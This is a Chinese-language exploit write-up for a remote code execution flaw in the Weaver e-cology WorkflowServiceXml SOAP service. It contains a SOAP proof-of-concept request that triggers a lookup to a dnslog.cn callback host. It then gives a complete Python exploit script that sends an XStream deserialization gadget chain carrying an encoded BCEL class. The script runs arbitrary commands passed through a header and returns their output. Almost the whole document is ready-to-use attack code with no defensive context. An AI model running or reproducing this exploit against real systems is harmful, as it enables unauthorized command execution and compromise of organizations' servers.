泛微 WorkflowServiceXml RCE 复现
POC:
POST /services%20/WorkflowServiceXml HTTP/1.1 Host: xxx.xxx Content-Type: text/xml;charset=UTF-8 Content-Length: 496 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> <web:string><map> <entry> <url>http://wtc9gq.dnslog.cn</url> <string></string> </entry> </map></web:string> <web:string>2</web:string> </web:doCreateWorkflowRequest> </soapenv:Body> </soapenv:Envelope>
执行命令
#! /usr/bin/env python # -*- coding: utf-8 -*- import urllib import random import base64 import requests def encode(cmd): res = base64.b64encode(cmd) strs = res[::-1] return strs def decode(content): content = urllib.unquote(content) strs = content[::-1] res = base64.b64decode(strs) return res def exploit(url,cmd='ipconfig'): expurl = url + "/services%20/WorkflowServiceXml" cookies = {"JSESSIONID": "abcyPRTxFtGCX_WSXoKxx", "ecology_JSessionid": "abcyPRTxFtGCX_WSXoKxx", "testBanCookie": "test"} headers = { "WWW-Authenticate": encode(cmd), "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close" } data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> <web:string> <java.util.PriorityQueue serialization='custom'>   <unserializable-parents/>   <java.util.PriorityQueue>     <default>       <size>2</size>       <comparator class='javafx.collections.ObservableList$1'/>     </default>     <int>3</int>     <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>       <dataHandler>         <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>           <contentType>text/plain</contentType>           <is class='java.io.SequenceInputStream'>             <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>               <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>                 <names class='java.util.AbstractList$Itr'>                   <cursor>0</cursor>                   <lastRet>-1</lastRet>                   <expectedModCount>0</expectedModCount>                   <outer-class class='java.util.Arrays$ArrayList'>                     <a class='string-array'>                       <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$adW$7bx$U$d5$V$ff$dddwg2$99$85dB$C$83$P$96$Aq$Bw$X$d0$a2N$88$92$c4$60$C$nh6$Y$D$C$$$b3$93dawf$9d$9d$rPk$d5$96$be_V$5b$w$b6$b5j$a5i$edCm$eb$s$r$82$b6$a5h$a9$7d$d1$aa$ad$c5$dab$dfO$fb$f8$a3_$bf$7e$a4$e7$cef$93$y$d9$K$7f4_rg$ee9$e7$fe$ce$fb$dc$c9$893$87$8f$CX$85$7fH$88$a0_$c4$80$88A$J$J$ec$92$mb$b7$88$q$7f$a6$E$98$o$y$Ri$R$b7$8a$b0$rd$e0$f0$r$xa$P$86$E$ec$95P$85$7d$C$de$yA$c1m$7cy$8b$80$db$r$d4$a2$9f$_o$e5$cb$j$i$e9N$Rw$f1$83o$T$f0v$J$Xc$bf$80w$88x$a7$84$Q$de$r$e1$ddx$P_$de$x$e2$7d$9c$f2$7e$R$l$Q$f0A$R$l$Sq7$b7$ef$c3$9cz$8f$88$7bE$7cD$c0G$f9$ee$80$80$8f$89$b8O$c2A$dc$_$e0$e3$S$b9$d2$_$e0$T$S$$$c7$t$f9$f2$A_$ee$e0$e4Oq$fd$P$KxH$82$c6$cd$ea$c4$c3$9c$f2i$be$7dD$c2$n$7c$86o$87E$7c$96$e3$7eN$c4$a3$o$3e$_$e2$L$o$be$c8$Z_$e2$3e$3c$s$e2q$RO$88$f8$b2$80$af0$f8$d6$q$cc$84s5Cyp$e9$8d$M$9eV$xn0$cc$eeL$98FW6$b5$d3$b0$7bb$3b$93D$a94$f6$gz$ab$95J$c5$cc8CC$b0sWlO$y$92$8c$99$D$91$a8c$t$cc$81$c6$a53I$M$fe$a8$T$d3wo$8c$a5$5d$Y$ca$81$80$af$KxR$40$8e$oN$c1$a6$Y$K$Ya$90$da$f6$eaF$daIXfF$c0$u$83$b8FO$ba$86Qp$F$7c$8d$oD$c1$Sp$98$q$a3V$d6$d6$8du$Jn$95$bf$db$c8$a4$e9$8c$R$e6$baelD$X$D$Y$E$x$T6c$vR8$s$e3$vt$cb8$82$a3$e4$e3P$c2$94$f14$9ea$a8$3a$dbX$3a$a4$a7$e2ar$93$a1$y$a2$d36$b23aF2$83$b4$N$e9$C$be$$$e3$h$f8$a6$8cc$f8$W9$m$e38$9eeP$5d$94$84$V$e90$d3Y$87$80$8cX$aa$db$88$c5$N$9b$db$f2$iC$5dA$a0$r$db$dfo$d8F$7c$8a$fbm$Z$t$b8Qs$cf$b6$a4$r$9bH$ba2$df$c1$f32$be$8b$a32$be$87$ef3$d4wY$B$db$c8d$93N$c0$b2$D$Z$xe8$83$q$k$Y2L$t0d$5b$e6$c0Bn$de$P$Yj$a6$m$t$e3$w$e3$878Y$e4w$cf$m$99K$c9$94$j$f7$a5$d3$d2c$c9$8c$8c$l$e1$c7$Uq$Z$_$e0E$Z$_$e1$t$M$8b$f9$990$3f$T$ee$99$S$5d$3c$ed$9d$S$y$e3$a7x$99$c1$eb$e4$eb$a5f$eb$b4r$d8$b4s$97$a1$3bT$O$cb$ce$Hiq$9b$e9$d8$fb$IjO$y$995d$fc$M$a7d$bc$c2CU$af$5b$a9$b0$k$cb$ea$83V8c$d8$7b$M$3b$3c$e88$e9p$3b$z$dd$c6$adY$p$e30T$M$YN$bb$he$aa$e3$v$hZ$93$b1$My$f7s$bcZ$U$84$bciD$ea$ed$ed$N5g$9dA$KfB$8f9T$3a$87e$fc$C$bf$a4$if$b2f$q$95$c8$e8$91$96$e6h$db$ea$cb$af5t$cbE$af$9b$999$9ed$9e$dc$d32$5e$c3$afd$fc$g$bf$e1$db$df$ceDi3$5d$U$Z7$f0$f2$fc$j$7e$_$e3$P$f8$a3$80$3f$f1$tQ$fe$8c$bf0$y$d4$f3$j$X$e0$dd$97u$8cx$60g$d6$J$98$96$c3$L$c1$z$7c$Z$7f$c5$vrzG$81$40$f9$a4$At$c7$866e$j$aaI$aa$e34$99$e6$qM$86$83$ed$3d$3d$d7GV$86W$GV$adX$R$d8$b4A$8a$ba1$d4$C$d4ET$ea$97$85$89$b5J$ba$v$b4$b99D$9d$9e$8e9$JJ$a5$W$e8hk2$e2$D$c6$a5$fa$a0M5$d7$b4Rj$b5L$87$c2$Ur$5d$m$b7$b5$40$o$ce$c3$e6$ec$9bd$f5$ecK$d3I$c7$d8$ebD$G$9dT$b21$a0$P$c6$ec$8c$e14e$9d$fe$d0$95$93b$9d$869$e0$Mj$B$Z$af$e3o$bc$e0$ffN$3d$c5$b9$s$r$85$8aV$L$e8I$xcH$S$cfL$T$f9$d2$60$d8$b6e$d3$9b$d7e$d0$a0$e8$9e$f4$bb$a8$e4$s$tP$f5$U$edz$db$d2$8dL$a6$d0$l$c5m$5b$d45T$90$d6$d0D$nO$can$9a$ec$a5$a2$a6$b5$8d$fe$qY$hY$970$92$d4M$f3fr6R$a3Z$f1$e2$99$b3$_$e3$Y$a4$b3$92rEf$a5$N$db$a1$8a$aft$acNk$c8$b0$5bc$dc$9f9$c1$92$pU$d4$vx$b1$84I$7e$5c0$7d$M$b7R$84$a3$bc$JL$ddh$5c$ba$a5$c8$f3$ee$y$a5$tE$98$S$af$8d$c2$a6$b6H$c1$E$994xx$b51$E$83$r$C$3a$fd$c4D$3c$e9$c4$y$82$z$8a$e5$dc$Ctq$90It$5e$b0$q$83_$3e5S$ac$fc$98t$a9$a2$3b$h$e8$3e$a2$cb$w$96N$h$fc$fe$J$9d$d7$fd31Hy$cc$i$ab0$e5$7d$U$o$9as$dc$fb$99$T$8a$87$ed$92s$60Oy$ed$d7$b3$b6Me$5c$Y$a4$c5$J$cbSI$ac$8a$82C3$p$Z$a3$f1$3fQ$q$e7$b2$bf$a8$a6$b8$sj$9df$9d$abM$b8E$e9$Jn$e1$a1$v$t$e4$b3$$$e3$82$p$a5$a6$af$d0o$d9$5d1$9e$f9$r$e7$d0$ef$OK$k7R$e0$be$f3$e4$94$S$QH$m$PY$3d$cd$cbB$c1$af$z$a1f$eb$M$94R$8e$e7$RH$81$_a$ee$b1v$T$feU$r$bc$yq$c7$94t$bc$b6$94$bb$U$3f$c16h$fe$f1$5e$9b_$a2$d7$f2$d3$9c$8e$cbqw$e2$e7$f74$c9K$a1mm$a1$99$U$dc$da$e2V$y$85$a2e$9fcdx$a2$5c$8e$cfp$a7$3d$3fK$o$a5$ba$3a$3ffL$c3$89l$ee$ee$9c$b8$h$c8$c0D$a6$z$95$e6$a3$81$3e$cf$a86$fd$84$i$cd$d2$b4$d0$f3I$f1$r$dd$B$ea$b2$3b$Y$$$Mv$fc$ef$$$c0B$fa$5e$8c$80$ff$94$d3$t$S$7d$w$d1$ba$89v$X$d1$93$be$9a$e0$5d6$C$f6$E$f8$f7$d3$f5$b4$fa$5cb$F$q$7eC$a1$8c$8b$96$df$C$Pd$S$b8O$v$db$a8$94u$v$e5$a3$f0$e4$e0U$7c9$I$H1$cfw$Eb_$b9R$R$ed$f3$uR$b4$cf$bb$y$3a$8c$da$Jb$r$t$ca$$Q$f3$8c$c2$af$d2$c1Y$9d$cbs$98$ady$c7P$d5$a7zGP$ad$f9$c6$a0$f4$a9$be$R$d4h$82$w$e40$a7o$e3q$a8c$a8$ed$hA$5d$u$87$b9$97$d2_$O$f3$ba$86$c7_$L$ve9$a8$f7C$O$v$f3$e9$e5$m$pk$fc$cbr$b8$m$8f$eaqQ$3d$i$d5$eb$a2z9$aaO$f5$bd1$ea0$9e$d2$3c$ca$fc$ae$b3$d1q$e8$ff$83$be$5d$Tg$40_W$E$5d$e1BWph$c9$85$968t$a5Z$f9$c6$d0$aa$f8t$e8q$ca$8f$P$fb$e9k$e9B$fed$8d$94$c1Wp$9a$3fY$pkr$f7env$ef$c1bZ$fdT$K$b3H$b2$g$d7$60$O$da$e9$df$83$$$d4$a1$Ps$R$87$K$T$f3$Jk$B$O$m$80$H$a8$7c$kA$3d$k$c3$o$i$c6$S$fa$cel$c0$cb$I$ba$9a$5e$a5$S$3aMr$ff$q$b9$ff$60$n$xC$3d$f3c$R$9b$87$r$ac$k$N$ecJ$EI$f3$C$b6$J$B$d6K$fcm$c4$l$q$7e$86$f8$b7$T$ff$5e$ye$H$b0$MQ$b2$e8$M$aa$ce$609$E$f4$d0$ef$N$C6$8f$93$o$d1$dd$de$98$t$SM$40$af$80$9b$E2$U$e3$a4$d73$9d$NT$9f$c1$a2I$89$7fa$c18$b9$ccE$s$40$c1$El$a9$h$t$3f$84b$d8I$cc$d2g$b6$8e$a3$G$V$d3h$f4CTn$c2$o$c8$c5$s$b8$9c$b3$ac$y$7d$b4X$Np3$fdy$a8$f3$b6$d1$ffk$db$L$zZ$deA$bb$b9$94$c3$97Fq$d1$G$e5beA$O$81$ce$e5$d4A$L$97S$dd$d4oT$W$8db1$95$ec$S$a2k$k$d5$c39$aa$87$8a$a3$fe$Z4$d0$af$e6U$$$n$J$5e$9fJ$90$cbPsq$Z$a5L$TU$afV$a1V$i$5d$z$95$af$ae$ac$ad$ac$95$kf$96ZQ$5b$b9J$93U$f98$db$a6$K$aaL8$9a_$f5$lg$ebU$7f$OKsX$a6$yw$3bNs$f7$ca$a5$9e$p$IQ$8f$8b$d1$i$c2$da$yu$96$ea$tJ$84$u$x$88$b2$f2$Z$88$da$ec1$9a$CcXE$85$7b$d9$Y$$$efSg$8f$e0M9$ac$ce$e1$8a$i$ae$i$c1U$5cB$pn$a3$3a$7b$Ukrh$ca$e1j$ad$ca$V$ad$9a$U$d5$aa$d4$aaQ$5c$c3$l9$ac$3d$IQi$k$86W$ad$oB$de$b0$W$a5$95$bbW$adV$bb$n$a8$e6$e4zMQ$95$J$ee$b5$e5d$v7$b2F$adQ$V$daD$c8$3em$8e$3a$87$bb$d1V$e4F$adZ$ab$ce$c9$bb1$d1p$ca$3a$ea6$ae$f9$baj$3cwK$O$edJ$c7$Ea$ae$b2$3e$df$88$dc$dd$deIm$h$K$da$ea$d4$baIm$bd$c3$98EFk$fe$fd$95l$f8$cc$dd$c3$f0lx$82$ca$c0f$c7$d8$Jj$s$b0$93$ec$Fz$e6$db$f4Qj$L$60$F$95$c4$w$g$bc$97Q$a3$ae$a6B$b8$8a$g$ae$91$9ap$Nu$ca$d5$b4k$c6Z$b4$a2$D$d7R$b1$ac$a36jG$8av66$e06$9a$f9w$d2$ac$bf$9bJ$e9$Qq$P$T$ea$v$g$e7$af$p$ca$Yz$98$88$cdLE$_$L$e2$s$WF$l$bb$C$5b$d9z$dcLm$ba$9d$r$b1$83$edG$9c$3dD$cfCH$b0Q$ecb$c7$b0$9b$3d$8b4Yj$b2$e7$d1$ceN$oK$d6f$d8$8b$d8$e3$b6$ef$83$a8$Y$c7$O$de$O$3b$E$dc$o$m$s$60$a7$fb$d2Px$a1$3ao$m$d5T$faO$a2$fa$5cb$$$87$7e$f5B$7f4$d3$3aNC$c8$7f$k$t$81$W$ea$f4$7f$83$8d$c3$cb$3b$8e$ef$f8$e5$Ww$87$a0$f1_$h$85$f7$ae8$S$A$A </string>                     </a>                   </outer-class>                 </names>                 <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>                   <parent class='sun.misc.Launcher$ExtClassLoader'>                   </parent>                   <package2certs class='hashtable'/>                   <classes defined-in='java.lang.ClassLoader'/>                   <defaultDomain>                     <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>                     <principals/>                     <hasAllPerm>false</hasAllPerm>                     <staticPermissions>false</staticPermissions>                     <key>                     </key>                   </defaultDomain> <domains class="java.util.Collections$SynchronizedSet" serialization="custom">         <java.util.Collections_-SynchronizedCollection>           <default>             <c class="set"></c>             <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>           </default>         </java.util.Collections_-SynchronizedCollection>       </domains>                  <packages/>                   <nativeLibraries/>                   <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>                   <defaultAssertionStatus>false</defaultAssertionStatus>                   <classes/>                   <ignored__packages>                     <string>java.</string>                     <string>javax.</string>                     <string>sun.</string>                   </ignored__packages>                   <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>                     <__path>                       <paths/>                       <class__path>.</class__path>                     </__path>                     <__loadedClasses/>                   </repository>                   <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>                 </processorCL>               </iterator>               <type>KEYS</type>             </e>             <in class='java.io.ByteArrayInputStream'>               <buf></buf>               <pos>0</pos>               <mark>0</mark>               <count>0</count>             </in>           </is>           <consumed>false</consumed>         </dataSource>         <transferFlavors/>       </dataHandler>       <dataLen>0</dataLen>     </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>     <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>   </java.util.PriorityQueue> </java.util.PriorityQueue></web:string> <web:string>2</web:string> </web:doCreateWorkflowRequest> </soapenv:Body> </soapenv:Envelope>''' resp = requests.post(expurl, headers=headers, cookies=cookies, data=data) if '&error=' in resp.content and 'Auth=' in resp.content: result = resp.content.split('&error=')[0] result = result.replace('Auth=','') print decode(result) if __name__ == '__main__': import sys if len(sys.argv)<3: print 'python '+sys.argv[0]+' url cmd' else: url = sys.argv[1] cmd = sys.argv[2] exploit(url,cmd)